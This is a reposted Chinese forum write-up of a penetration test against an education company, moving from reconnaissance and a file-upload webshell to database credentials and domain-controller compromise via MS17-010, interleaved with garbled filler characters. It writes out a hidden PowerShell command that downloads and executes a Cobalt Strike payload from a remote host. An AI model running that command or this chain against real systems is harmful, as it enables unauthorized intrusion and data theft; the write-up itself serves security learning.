|
; P. E; ?; q$ k' E* Z8 I1 _: l
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
" u8 t+ q4 Z4 F/ _
8 v- _ W4 d. H* k) |( ~2 }+ k! G( |
; s. l% e( }* X9 k: p
! t" t4 W# _* f. K
1 _% j3 A/ F* u& A
正文
3 r( j5 {" K) j% ]$ ] 1 N: ?/ A, H/ O" a' D
( \: }# Y" Q6 ]+ P" l- _ - Q4 |7 r, p# r I/ R
& O% x5 \3 v3 |( g, f- o% [
( K1 C4 j2 h9 }6 G9 Y7 m 目标:www.xxxx.com(一家教育机构)
# r: t; G! {) a( m& `打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能7 _" v3 |4 r; b3 x+ q3 ]. {
' ~. i6 e t4 |1 o
( `( z+ X/ U- e) m 
9 _' {$ @4 g3 H& c9 \ & }4 h, E* ~1 l0 \, g
! h# l6 J& g6 c5 S7 J* z
进行了简单的信息搜集
; c D! ]/ d" Y9 |) v
+ T9 T: R' O( b( e0 j8 w
; k6 P7 z+ Q2 a; f
1 b% Z& W% a( x1 L: \' e5 O
/ _, i6 q6 u/ Z u 子域名搜集3 P/ e- N- b( d( }9 p
, q4 f! W3 p% F7 }% b& U
' v v1 g6 z9 r' ^7 ?# n 
8 n' p7 W' s. o 4 B+ s9 t- U. [. P
* Z5 L3 A. }2 [/ P2 E fofa找资产
3 R& K4 D/ X) q) \. P
u' E6 Y( V% S- D5 m* @6 s* ~% @# H
3 T2 i8 X2 k: l6 G: `
. ?. Q" f4 O9 E5 ~+ L7 b" n, V( F4 o
' g3 N R, I) L+ ], V 5 J2 L6 }" s% C0 p" J- ?
+ F# M# ]; H4 Q }( P$ O7 h1 g* o
一共七个资产。去重之后只有两个。
5 T* O2 c. m* z, M* o1 Z0 O
) ?# E: {" g; Q" @
|0 f0 p3 k& h. ~3 o6 l) `) ~
% x( N, h! p: o, J& x* ^! g; ]3 S4 |
目录探测+ K# D) Z- Z; G v
+ }$ }# m+ z$ m) g
* j+ q! R4 r: J5 ~; u2 e2 C
 . F: L$ i/ k4 t/ D4 Q# z; W8 z
_, m9 b7 s% x: f! i |* m+ k. z
$ m5 _# @5 e" ]0 ^4 ~/ J: w- p$ @ 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
. X& y6 [* p& Z, s9 T0 J6 O& v
9 [: f4 j0 d* M' t! s5 Z$ u, ]2 \
+ N9 ~) \# N) s0 t3 [ * c J7 K$ ~+ K; z/ A
4 O/ _, Q6 X; Q( b9 u 我又尝试了通过修改返回包来绕过登录界面9 B2 t" O; J8 X% R' T# ]3 K; r
* m8 G, R* J7 `" F+ s7 H {# @5 p' [9 V( h2 T$ H
' G% R6 S, q- ]2 z 8 I0 |6 h8 K0 g
0 A, m) ` S3 {; X* K( X7 k. C 还是不行,尝试注入无果
, ? h8 W! g; h8 T9 a* i- c6 ^( \
, Z6 d5 M6 `7 n# C* b7 k' Z) Z0 W, a
, l& c2 l2 w+ g) y1 o/ J" n6 P 
+ ~3 h* r9 }* p+ U9 f 6 q! K% ~) O. q# V: l
7 |; n( }, G4 G% c- u7 s. b: U
不过我目录探测出了一处Spring信息泄露
( v, q" D6 G. G
, u, u- G m: R7 R1 S9 \0 w7 B' {# T8 I6 Y. _# b: Z
. Z% E; f" z0 X" s" H$ f( I3 y: [, o/ a/ _- d6 `
* D; H1 W4 a" C- n+ h: i
! {! z) x7 c" ?- [) D; r& e
" c: B3 l+ h( }$ x 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
+ ^ ^! g; ~; G1 i
5 f: ?8 h# m( G# D* T
! z0 ?% q2 W+ E$ d6 e1 n+ u  : m& _7 P' [ A d% Y9 p
( G$ C9 @0 D7 a0 W- I2 J
6 A* X# w' P: q" h' F* Z c
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。2 h0 W7 d! l' p7 a; Y" q
; m" k0 j/ [: [% t+ P# E
. G7 f! q# h* e. z) T7 @
7 e2 I/ G* R7 v- V4 ~4 N
3 U. j) s! F' V5 ?- x8 B* Y# y
8 }5 c7 T7 M5 d1 m$ t 获取有些师傅到这一步就手机抓包电脑测了。5 s7 p) y2 E, F7 M3 y# I5 x7 P
- y1 @8 O2 C4 t
7 y# x% y- F- [, [# G* V4 A! s f Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
, h, L q) q l5 R6 Y: a9 r % \2 u) X$ A* e* C( k# n
% r7 n l" l3 N* |8 S% ^3 [* H 其中在一个公众号发现了小程序,可以进行注册。$ H, d, w& n4 s* T& ?. v" O
' q) S# Y, D# u( D
0 a. g$ y& f& F4 g. p; w 看到了头像上传,尝试上传获取WebShell! `9 h, Z7 E8 ^$ i! p: F: L
1 n) L! A( C; Q D4 b& f" m2 T* v/ w6 ]0 \3 @3 s$ c
 - H8 Q. d" |* u1 W
9 q( R% o! R5 q8 A$ D4 N. A
7 d* r$ e: T$ s 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问0 |$ C7 w) C1 ^: h) g/ b0 O
1 b0 W' C+ c, K
% M& D2 A- w" d. g- i7 U' G 
$ T3 \+ q' |' [ $ L' ~4 `# |6 K* l9 y, q. k1 I" Y
; D. Q3 C- [" M 然后上了大马
3 {- m. a% l v9 ` 1 L$ v8 H2 H) Y
; k4 I6 y& G8 A/ V6 O0 \ j, j" U
+ S6 N. m9 R- ?+ `4 k0 z+ P: Z 0 e# Y ^: o8 d: g( z
9 u- y' x1 Y) b' c0 C3 X4 O
 5 @2 I! a/ M; d3 u {$ |
8 V+ ]8 z( L8 O! k) P+ s+ Y, C; p
/ A: A; }8 R+ v) [7 ~ H: S- K* r 通过翻找文件发现数据库账号密码
: y* S: B. f9 a/ t6 K* |4 v & ^5 T1 F4 T1 m7 y" i- d! n' _, G" U. p
y' H: y4 g4 P$ W- Y T8 c 
( a" m4 ]% g# T. F, x- @ , F6 P# d7 T0 ]! ^6 t& Q2 ^
1 a2 }" F8 b5 c9 P --内网渗透5 l& U' q5 m4 Q5 b
+ s1 t$ P, p8 H7 ?% A2 N
/ t. |$ i- S" P5 p9 X 直接通过powershell执行 cs上线
1 B0 m3 b5 h4 z- O- z $ `; ?, r- Q- G3 U4 o
* l0 E+ ?9 @, z' ~
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
3 m) U1 N j6 ~: N' j/ q$ U# F 8 \: Y. g) u/ V }( |4 y
6 @/ A3 B- y+ T7 d7 x( U
 7 P. e4 W: G/ N! E: U' ?
4 g* [4 p, y2 a
5 J" L% g2 ?4 E% ^
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破3 I" U; L" o, w: Z* [# C
$ O# W6 p7 I; j( j
& T% J5 I: J/ a0 j& E  % v0 M0 n- X6 m: o% C
/ _+ u8 M% X) u8 D% ?4 m' `( n. O+ o7 i- }- O t
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
2 i/ B1 w" E5 V. T
9 t$ F6 h4 j4 L. f
& S; |4 ` ]0 X5 e: L7 L+ p: X- U7 Q; n% B' g3 ]* c- J, c
( U5 ]5 E# F/ C8 b' P4 ~
0 Q- [3 B! v, c6 o/ h3 l7 J 
! F) G! E6 s# f5 `6 E# k
: ?% L, \; e$ G; y1 c, l$ \0 g) z* P) ?" `7 q" x
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
/ p+ [5 ]; |2 l; q+ ^' K8 e
5 I% M5 p) L8 N" @
; l# O* G/ a2 r7 z
0 Y6 f) b5 x3 C( S3 |, h4 W
/ A6 g: \. ~. g2 Z6 g 
+ |2 ^7 n7 k3 K2 u9 J7 r0 J# g
& G4 j, t6 j) ?) O8 M+ a& c# } B* u( B r# F+ l
& U% v- H& o) Z0 ?5 e4 W# M- r
6 H( l; S& t. w) p5 a. F
0 i' t" L a$ Q: I ! ^7 s: H# w6 ]0 o
6 P# c2 T/ q M& P 5 d2 q. }9 i' ]9 p
0 W6 g5 l. }5 S
, m3 D6 p6 [( X* C
小结; ^3 g- k( w# X! W1 L7 w
: ~, i7 r i8 l8 d2 @ ^( D
# k) q/ P' K9 [- [7 n
@4 O5 X( b! Z' m) o
0 j# ~6 R l; m1 U( `8 t- _; o2 i1 {$ p
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
# d0 W9 D- t3 ]% A. I& p
# O9 b$ t& w1 a4 }% A; l3 S
5 s; V# }4 B% v! ?. Y* ]0 C! C
6 M4 r4 s4 | ^! N- h( [ - h' y( t6 e( u) Y$ j5 u' }
4 i& j; l& K5 Y3 g) D% @
- 3 a2 [0 H _6 ]* p/ W: p
# w; f3 O2 V& Y- d& [+ _7 {8 L
' ] M# ~* x; \. z& @0 U3 G/ i$ t( Z8 |
-
$ d2 u' z; t! E+ e, z4 I# U1 S2 H
5 b s, s3 n" h$ _' J
6 {* `- T" N5 q: K4 B
4 Z7 `5 \. v9 P* n U
B1 P x4 Y' J; O 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
9 p7 C0 V9 j/ H y
M" R: Q* v" e( f; D% c$ R2 }( D0 l3 P/ @& C' r) f6 R' R
% l; k7 e+ c" W$ C5 P5 ~+ B* a
| 
发表于 2024-3-1 19:41:32
收藏
支持
反对